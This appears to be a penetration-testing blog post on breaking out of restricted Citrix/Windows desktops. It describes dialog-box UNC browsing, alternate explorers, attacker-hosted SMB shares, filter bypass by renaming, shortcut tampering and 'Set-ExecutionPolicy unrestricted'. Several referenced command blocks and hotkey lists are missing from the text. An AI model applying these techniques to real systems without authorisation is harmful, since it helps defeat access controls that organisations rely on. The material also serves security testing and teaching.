Windows Critix Breakout

Citrix is a lock-down measure implemented in the desktop environment to minimize the potential impact of malicious staff members or compromised accounts. Administrators can restrict other users using critix from applications they desire such as cmd.exe or powershell.exe. In environments where minimum hardening is implemented, we can search for the applications but we can’t run them and in a restrictive lock-down environment we won’t see any results if we search for the application.

Usually accessing C:\windows\system32 through file explorer will cause an error , preventing direct access to critical system applications .

There are plenty of ways to breakout from a Citrix environment but we will go through

  1. Abusing dialog boxes / Bypassing Path Restrictions
  2. Alternate Explorer
  3. Help Menu
  4. Accessing smb shares
  5. Environment Variables
  6. Bypassing write Restrictions
  7. Bypassing Executable restrictions
  8. Modifying existing shortcuts
  9. Script execution
  10. RDP / Critix breakout

1. Abusing Dialog Boxes

If we try to visit folders such as c:\Users or C:\windows\system32 it will result in an error due to the group policy in place to restrict users from browsing directories in the C:\ drive using file explorer

It is possible to use dialog boxes to bypass the restrictions implemented by group policy. There are plenty of desktop applications that allow users to navigate through system files

 Accessing any application that uses a dialog box can give us a way to bypass the restriction. This can be tools such as

If we run any of these applications we will see that it allows the user to open a dialog box and search for files and folders inside the system. We can enter a UNC path. UNC stands for “Universal naming convention” which is used to access network resources and has the following format : \\server\share\folder\file . In our localhost, we can use the same concept to access files

2. Alternate Explorer

In cases in which restrictions are placed upon the file explorer itself by Group policy, Alternative file systems like Q-DIR and Explorer++ can come in handy to bypass the restriction. Copying files from a smb share can also be done now which can be restricted otherwise. 

Note: Explorer++ is highly recommended due to it being portable and being able to be executed directly without installation. 


https://explorerplusplus.com/

Similarly if we can’t edit default registry we can install other applications such as :

https://sourceforge.net/projects/simpregedit
https://sourceforge.net/projects/uberregedit
https://sourceforge.net/projects/sre/

3. Help Menus

Help menus can be in numerous formats but specially application help menus and then generic “Windows help and Support” menu can come quite handy .

These menus often have links and shortcuts to other applications such as Command Prompt or Control panel .

4. Smb Shares

Smb share can me implemented on the attacker’s side to host applications such as command prompt, Portable Registry editors, etc … 

To host a smb share we can use the Impacket-smb server :

On the Client side we can use net use to connect to the share :

And lastly copy our desired binaries using Copy :

5. Environment Variables

This can be exploited in system where minimal hardening is implemented so it may be denied to access directories such as C:\ but symbolic links can be used to bypass the restriction. File protocol handlers can also come in handy for opening up applications that otherwise would be unavailable.

6. Bypassing Write Restrictions

This can come in handy when we want to use our own binaries on the system or write data to files for later usage. Temporary folders such as TEMP should be the first place we should look at and we can find the location of the directory using the %temp% system variable. 

TIP : We can also utilize tools such as accesscheck.exe to find directories that we have write access over .

7. Bypassing Executable Restrictions

These restrictions are usually put in place by using white/black lists . and can filter
1. Filenames
2. File extensions
3. Regex patterns
4. etc …

We can usually bypass them by changing the name of our file or using tools with extensions that are allowed .

Example: if .exe is denied we can try to use .ps1 

But if restrictions were put in place by a careful admin it’s pretty much impossible if not possible at all to bypass this restriction

8. Modifying Existing Shortcuts

If we can access a shortcut we can run an application of our choice. The window uses a link ( path) to connect the shortcut with the application and by changing the path we can execute other binaries. 

We can right-click on a shortcut > Properties > Target and change the target to our desired binary

In cases where shortcuts are not available, We can transfer a shortcut file using an smb share or create a new shortcut using Powershell 

Note : This method can also be used to set up a quick persistence method although it's not the best way to do so

9.Script Execution

When script extensions such as .bat, .vbs, .ps, etc .. are configured to automatically execute their code using interpreters then we can use these scripts to download files, upload files, execute any binary, etc .. 

We can create a new file with any of those extensions write code to execute the desired binary or perform the desired action and simply run it.

Powershell has an Execution policy ( A Security Measure)  It controls whether users can load configuration files, such as the PowerShell profile, and run scripts, and whether scripts must be digitally signed before they can be run.

We can check the Status of Execution policy and

c:\> Get-Executionpolicy 
C:\>Set-ExecutionPolicy unrestricted

For Further Details : https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4

TIP : We can also utilize tools such as powersploit which includes scripts that can come handy : https://github.com/PowerShellMafia/PowerSploit

10. RDP & Critix breakout

RDP and Citrix both have there own hotkeys in place that correspond to operating system functions. We can use these hotkeys to bypass restrictions and so stuff such as Opening the windows security dialog box or displaying task manager

Remote Desktop Hotkeys:

Citrix ICA Hotkeys:

I hope you enjoyed this blog see you in the next one Ciao